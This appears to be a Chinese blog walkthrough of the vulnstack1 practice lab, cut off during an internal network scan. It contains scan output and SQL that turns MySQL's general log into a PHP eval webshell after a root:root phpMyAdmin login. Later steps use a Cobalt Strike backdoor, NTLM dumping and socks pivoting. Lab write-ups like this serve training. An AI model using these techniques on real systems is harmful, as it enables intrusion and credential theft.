

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/b_1df622db11162cfed5e7fc2f7b420526.jpg">
  <link rel="icon" href="/img/b_1df622db11162cfed5e7fc2f7b420526.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="CXCX">
  <meta name="keywords" content="">
  
    <meta name="description" content="环境搭建拓扑图 VMWARE 网卡配置 VMnet3 作为外网WEB服务器与KALI攻击机的网卡 VMnet2 作为外网WEB服务器与域主机的网卡  这里由于WEB服务器需要让客户访问并且需要与内网主机进行通信所以需要配置俩个网卡。 各个主机IP 攻击机： Kali  IP ： 192.168.33.130   Web服务器： Windows7  IP ： 192.168.33.129（外网） I">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnstack1">
<meta property="og:url" content="https://r3bir7hcx.github.io/2025/04/24/vulnstack1/index.html">
<meta property="og:site_name" content="CXCX&#39;s Singularity">
<meta property="og:description" content="环境搭建拓扑图 VMWARE 网卡配置 VMnet3 作为外网WEB服务器与KALI攻击机的网卡 VMnet2 作为外网WEB服务器与域主机的网卡  这里由于WEB服务器需要让客户访问并且需要与内网主机进行通信所以需要配置俩个网卡。 各个主机IP 攻击机： Kali  IP ： 192.168.33.130   Web服务器： Windows7  IP ： 192.168.33.129（外网） I">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://r3bir7hcx.github.io/img/articleImg/6.jpg">
<meta property="article:published_time" content="2025-04-24T10:37:22.000Z">
<meta property="article:modified_time" content="2025-04-25T04:19:39.097Z">
<meta property="article:author" content="CXCX">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="内网">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://r3bir7hcx.github.io/img/articleImg/6.jpg">
  
  
  
  <title>vulnstack1 - CXCX&#39;s Singularity</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"r3bir7hcx.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>CXCX&#39;s Singularity</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>Links</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://api.dujin.org/bing/1366.php') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="vulnstack1"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-04-24 18:37" pubdate>
          April 24, 2025 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.8k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          24 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">vulnstack1</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><h2 id="拓扑图"><a href="#拓扑图" class="headerlink" title="拓扑图"></a>拓扑图</h2><p><img src="/img/vulnstack1/image-20250425090343673.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="VMWARE-网卡配置"><a href="#VMWARE-网卡配置" class="headerlink" title="VMWARE 网卡配置"></a>VMWARE 网卡配置</h2><p><img src="/img/vulnstack1/image-20250425090401929.png" srcset="/img/loading.gif" lazyload></p>
<p><code>VMnet3</code> 作为外网WEB服务器与KALI攻击机的网卡</p>
<p><code>VMnet2</code> 作为外网WEB服务器与域主机的网卡 </p>
<p>这里由于WEB服务器需要让客户访问并且需要与内网主机进行通信所以需要配置俩个网卡。</p>
<h3 id="各个主机IP"><a href="#各个主机IP" class="headerlink" title="各个主机IP"></a>各个主机IP</h3><ul>
<li><strong>攻击机</strong>： Kali <ul>
<li><strong>IP</strong> ： 192.168.33.130</li>
</ul>
</li>
<li><strong>Web服务器</strong>： Windows7 <ul>
<li><strong>IP</strong> ： 192.168.33.129（外网）</li>
<li><strong>IP</strong> ： 192.168.52.143 （内网）</li>
<li><strong>主机名</strong>: stu1</li>
</ul>
</li>
<li><strong>域成员</strong>： Windows Server 2003<ul>
<li><strong>IP</strong> ： 192.168.52.141</li>
<li><strong>主机名</strong>：root-tvi862ubeh</li>
</ul>
</li>
<li><strong>域控</strong>：     Windows Server 2008<ul>
<li><strong>IP</strong> ： 192.168.52.138</li>
<li>主机名：owa</li>
</ul>
</li>
</ul>
<h2 id="开始前的操作"><a href="#开始前的操作" class="headerlink" title="开始前的操作"></a>开始前的操作</h2><p>需要进入<code>Windows7</code> 找到<code>phpstudy</code>打开web服务。</p>
<h1 id="外网渗透"><a href="#外网渗透" class="headerlink" title="外网渗透"></a>外网渗透</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="探测主机"><a href="#探测主机" class="headerlink" title="探测主机"></a>探测主机</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs shell">┌── root@kali -&gt; [/tmp] <br>└─# arp-scan -l<br>Interface: eth0, type: EN10MB, MAC: 00:0c:29:29:88:93, IPv4: 192.168.33.130<br>Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)<br>192.168.33.1    00:50:56:c0:00:03       VMware, Inc.<br>192.168.33.129  00:0c:29:27:08:23       VMware, Inc.<br>192.168.33.254  00:50:56:f7:12:b7       VMware, Inc.<br></code></pre></td></tr></table></figure>

<p>得到目标主机IP <code>192.168.33.129</code></p>
<h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs shell">┌── root@kali -&gt; [~/tools] <br>└─# ./fscan -h 192.168.33.129 -np<br><br>   ___                              _    <br>  / _ \     ___  ___ _ __ __ _  ___| | __ <br> / /_\/____/ __|/ __| &#x27;__/ _` |/ __| |/ /<br>/ /_\\_____\__ \ (__| | | (_| | (__|   &lt;    <br>\____/     |___/\___|_|  \__,_|\___|_|\_\   <br>                     fscan version: 2.0.0<br>[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880<br>[*] 开始信息扫描...<br>[*] 最终有效主机数量: 1<br>[*] 共解析 218 个有效端口<br>[+] 端口开放 192.168.33.129:80<br>[+] 端口开放 192.168.33.129:445<br>[+] 端口开放 192.168.33.129:139<br>[+] 端口开放 192.168.33.129:135<br>[+] 端口开放 192.168.33.129:3306<br>[+] 存活端口数量: 5<br>[*] 开始漏洞扫描...<br>[!] 扫描错误 192.168.33.129:139 - netbios error<br>[*] NetInfo<br>[*] 192.168.33.129<br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] stu1</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.33.129</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.52.143</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 169.254.129.186</span><br>[+] MS17-010 192.168.33.129     (Windows 7 Professional 7601 Service Pack 1)<br>[*] 网站标题 http://192.168.33.129     状态码:200 长度:14749  标题:phpStudy 探针 2014<br>[!] 扫描错误 192.168.33.129:3306 - Error 1130: Host &#x27;192.168.33.130&#x27; is not allowed to connect to this MySQL server<br>[+] 扫描已完成: 5/5<br>[*] 扫描结束,耗时: 19.494685409s<br></code></pre></td></tr></table></figure>

<p>扫出来了永恒之蓝，不过先来看看web服务。并且也有多个IP地址，有内网主机。</p>
<h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs shell">┌── root@kali -&gt; [~/tools] <br>└─# dirsearch -u http://192.168.33.129<br>/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html<br>  from pkg_resources import DistributionNotFound, VersionConflict<br><br>  _|. _ _  _  _  _ _|_    v0.4.3<br> (_||| _) (/_(_|| (_| )<br><br>Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460<br><br>Output File: /root/tools/reports/http_192.168.33.129/_25-04-24_21-17-35.txt<br><br>Target: http://192.168.33.129/<br><br>[21:17:36] Starting: <br>[21:17:38] 403 -  215B  - /%C0%AE%C0%AE%C0%AF<br>[21:17:38] 403 -  211B  - /%3f/<br>[21:17:38] 403 -  210B  - /%ff<br>[21:17:40] 403 -  220B  - /.ht_wsr.txt<br>[21:17:40] 403 -  223B  - /.htaccess.orig<br>[21:17:40] 403 -  223B  - /.htaccess.save<br>[21:17:40] 403 -  224B  - /.htaccess_extra<br>[21:17:40] 403 -  221B  - /.htaccessBAK<br>[21:17:40] 403 -  223B  - /.htaccess.bak1<br>[21:17:40] 403 -  225B  - /.htaccess.sample<br>[21:17:40] 403 -  222B  - /.htaccessOLD2<br>[21:17:40] 403 -  213B  - /.htm<br>[21:17:40] 403 -  223B  - /.htaccess_orig<br>[21:17:40] 403 -  221B  - /.htaccessOLD<br>[21:17:40] 403 -  223B  - /.htpasswd_test<br>[21:17:40] 403 -  214B  - /.html<br>[21:17:40] 403 -  221B  - /.htaccess_sc<br>[21:17:40] 403 -  219B  - /.htpasswds<br>[21:17:40] 403 -  220B  - /.httr-oauth<br>[21:18:08] 403 -  225B  - /index.php::$DATA<br>[21:18:18] 200 -   71KB - /phpinfo.php<br>[21:18:18] 301 -  241B  - /phpmyadmin  -&gt;  http://192.168.33.129/phpmyadmin/<br>[21:18:18] 301 -  241B  - /phpMyAdmin  -&gt;  http://192.168.33.129/phpMyAdmin/<br>[21:18:19] 200 -    4KB - /phpmyAdmin/<br>[21:18:19] 200 -   32KB - /phpmyadmin/ChangeLog<br>[21:18:19] 200 -    4KB - /phpMyAdmin/<br>[21:18:19] 200 -    4KB - /phpMyadmin/<br>[21:18:19] 200 -    4KB - /phpmyadmin/<br>[21:18:19] 200 -    4KB - /phpmyadmin/index.php<br>[21:18:19] 200 -    4KB - /phpMyAdmin/index.php<br>[21:18:19] 200 -    2KB - /phpmyadmin/README<br>[21:18:31] 403 -  225B  - /Trace.axd::$DATA<br>[21:18:34] 403 -  226B  - /web.config::$DATA<br></code></pre></td></tr></table></figure>

<h2 id="GETSHELL"><a href="#GETSHELL" class="headerlink" title="GETSHELL"></a>GETSHELL</h2><p><img src="/img/vulnstack1/image-20250425091930914.png" srcset="/img/loading.gif" lazyload></p>
<p>访问web，能够得到绝对路径<code>C:/phpStudy/WWW</code></p>
<p>phpmyadmin，需要登录 </p>
<p><img src="/img/vulnstack1/image-20250425092015350.png" srcset="/img/loading.gif" lazyload></p>
<p>弱口令直接进去<code>root:root</code> 。或者爆破。</p>
<p>进去后查看一下sql变量设置 </p>
<p><img src="/img/vulnstack1/image-20250425092429735.png" srcset="/img/loading.gif" lazyload></p>
<p>查找能否getshell的点。</p>
<p>查找<code>secure_file_priv</code>参数，是否允许写入文件。</p>
<p><img src="/img/vulnstack1/image-20250425092542084.png" srcset="/img/loading.gif" lazyload></p>
<p>看来是null。那么试着写入日志，查看日志文件路径。</p>
<blockquote>
<p>MySQL5.0版本以上会创建日志文件，通过修改日志的全局变量打开日志并指定日志保存路径，再通过查询写入一句话木马，此时该木马会被日志记录并生成日志文件，从而GetShell。但是前提是要对生成的日志文件有读写权限。</p>
</blockquote>
<p><img src="/img/vulnstack1/image-20250425092625730.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/vulnstack1/image-20250425092648487.png" srcset="/img/loading.gif" lazyload></p>
<p>日志路径：<code>C:\phpStudy\MySQL\data\stu1.log</code></p>
<p>但日志保存状态是<code>OFF</code></p>
<p>需要打开它。执行sql语句即可。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">set</span> <span class="hljs-keyword">global</span> general_log <span class="hljs-operator">=</span> &quot;ON&quot;;<br><span class="hljs-keyword">set</span> <span class="hljs-keyword">global</span> general_log_file<span class="hljs-operator">=</span>&quot;C://phpStudy/www/shell.php&quot;;<br><span class="hljs-keyword">select</span> &quot;&lt;?php eval($_POST[1]);?&gt;&quot;;<br></code></pre></td></tr></table></figure>

<p>改变日志保存状态以及保存路径为 web目录。并且执行查询语句将一句话木马保存到目标日志文件。</p>
<p><img src="/img/vulnstack1/image-20250425093010509.png" srcset="/img/loading.gif" lazyload></p>
<p>成功后访问蚁剑连接。</p>
<p><img src="/img/vulnstack1/image-20250425093150200.png" srcset="/img/loading.gif" lazyload></p>
<p>成功上马。</p>
<h1 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h1><h2 id="cs上线"><a href="#cs上线" class="headerlink" title="cs上线"></a>cs上线</h2><h3 id="cs前置"><a href="#cs前置" class="headerlink" title="cs前置"></a>cs前置</h3><p>首先启动一下server端。</p>
<p><img src="/img/vulnstack1/image-20250425093346300.png" srcset="/img/loading.gif" lazyload></p>
<p>接着打开客户端连接</p>
<p>按照设置的 IP 与密码连接即可 </p>
<h3 id="创建Listener"><a href="#创建Listener" class="headerlink" title="创建Listener"></a>创建Listener</h3><p>左上角<code>Cobalt Strike</code> -&gt; <code>Listen</code> -&gt; <code>Add</code> </p>
<p><img src="/img/vulnstack1/image-20250425093906834.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="生成后门文件"><a href="#生成后门文件" class="headerlink" title="生成后门文件"></a>生成后门文件</h3><p><img src="/img/vulnstack1/image-20250425093954976.png" srcset="/img/loading.gif" lazyload></p>
<p>选择监听器后生成</p>
<p><img src="/img/vulnstack1/image-20250425094010582.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="上传蚁剑执行"><a href="#上传蚁剑执行" class="headerlink" title="上传蚁剑执行"></a>上传蚁剑执行</h3><p><img src="/img/vulnstack1/image-20250425094109037.png" srcset="/img/loading.gif" lazyload></p>
<p>这里还有另外一个系统，但是我通过打下来后发现，其实并没有什么区别。最后再放这里的getshell吧。</p>
<p>然后执行后门文件。</p>
<p><img src="/img/vulnstack1/image-20250425094159239.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/vulnstack1/image-20250425094204425.png" srcset="/img/loading.gif" lazyload></p>
<p>成功上线，打开<code>beacon</code></p>
<h2 id="获取域内信息"><a href="#获取域内信息" class="headerlink" title="获取域内信息"></a>获取域内信息</h2><h3 id="查找域控"><a href="#查找域控" class="headerlink" title="查找域控"></a>查找域控</h3><p><code>ipconfig /all</code></p>
<p><img src="/img/vulnstack1/image-20250425094400916.png" srcset="/img/loading.gif" lazyload></p>
<p><code>god.org</code>且当前域为<code>stu1.god.org</code></p>
<h3 id="查找域内用户"><a href="#查找域内用户" class="headerlink" title="查找域内用户"></a>查找域内用户</h3><p><code>net user /domain</code></p>
<p><img src="/img/vulnstack1/image-20250425094610248.png" srcset="/img/loading.gif" lazyload></p>
<p>域内用户：<code>administrator , ligang , liukaifeng01</code></p>
<h3 id="域内主机"><a href="#域内主机" class="headerlink" title="域内主机"></a>域内主机</h3><p><code>net group &quot;domain computers&quot; /domain</code></p>
<p><img src="/img/vulnstack1/image-20250425094719015.png" srcset="/img/loading.gif" lazyload></p>
<p>域内有俩台主机（第一个不在）<code>ROOT-TVI862UBEH[192.168.52.141] ， STU1[192.168.52.143]</code></p>
<h3 id="域控"><a href="#域控" class="headerlink" title="域控"></a>域控</h3><p><code>net group &quot;domain controllers&quot; /domain</code></p>
<p><img src="/img/vulnstack1/image-20250425094952939.png" srcset="/img/loading.gif" lazyload></p>
<p>域控为：<code>owa</code></p>
<h3 id="总"><a href="#总" class="headerlink" title="总"></a>总</h3><ul>
<li>域控：<code>owa</code></li>
<li>域内用户：<code>administrator , ligang , liukaifeng01</code></li>
<li>域内主机：<code>ROOT-TVI862UBEH[192.168.52.141] ， STU1[192.168.52.143]</code></li>
<li>域：<code>god.org</code></li>
</ul>
<h2 id="横向"><a href="#横向" class="headerlink" title="横向"></a>横向</h2><h3 id="获取凭证"><a href="#获取凭证" class="headerlink" title="获取凭证"></a>获取凭证</h3><blockquote>
<p>获取凭证即获取NTLM哈希，它是一个身份验证协议，在Windows中，NTLM存储在SAM数据库或NTDS.dit文件。如果获取到NTLM哈希可以尝试PTH攻击，哈希破解，中间人攻击等操作。</p>
</blockquote>
<p><img src="/img/vulnstack1/image-20250425100226885.png" srcset="/img/loading.gif" lazyload></p>
<p>获取到NTLM。下一步进行内网探测。</p>
<h3 id="内网探测"><a href="#内网探测" class="headerlink" title="内网探测"></a>内网探测</h3><p>使用<code>socks</code>模块搭建隧道 </p>
<p><img src="/img/vulnstack1/image-20250425100359678.png" srcset="/img/loading.gif" lazyload></p>
<p>到kali中使用<code>proxychains</code></p>
<p>搭建好后，我选择使用fscan进行扫描。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><code class="hljs shell">┌── root@kali -&gt; [~/tools] <br>└─# proxychains4 ./fscan -h 192.168.52.0/24 <br>[proxychains] config file found: /root/.proxychains/proxychains.conf<br>[proxychains] preloading /usr/local/lib/libproxychains4.so<br><br>   ___                              _    <br>  / _ \     ___  ___ _ __ __ _  ___| | __ <br> / /_\/____/ __|/ __| &#x27;__/ _` |/ __| |/ /<br>/ /_\\_____\__ \ (__| | | (_| | (__|   &lt;    <br>\____/     |___/\___|_|  \__,_|\___|_|\_\   <br>                     fscan version: 2.0.0<br>[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880<br>[*] 开始信息扫描...<br>[*] CIDR范围: 192.168.52.0-192.168.52.255<br>[*] 已生成IP范围: 192.168.52.0 - 192.168.52.255<br>[*] 已解析CIDR 192.168.52.0/24 -&gt; IP范围 192.168.52.0-192.168.52.255<br>[*] 最终有效主机数量: 256<br>[+] 目标 192.168.52.1    存活 (ICMP)<br>[+] 目标 192.168.52.138  存活 (ICMP)<br>[+] 目标 192.168.52.143  存活 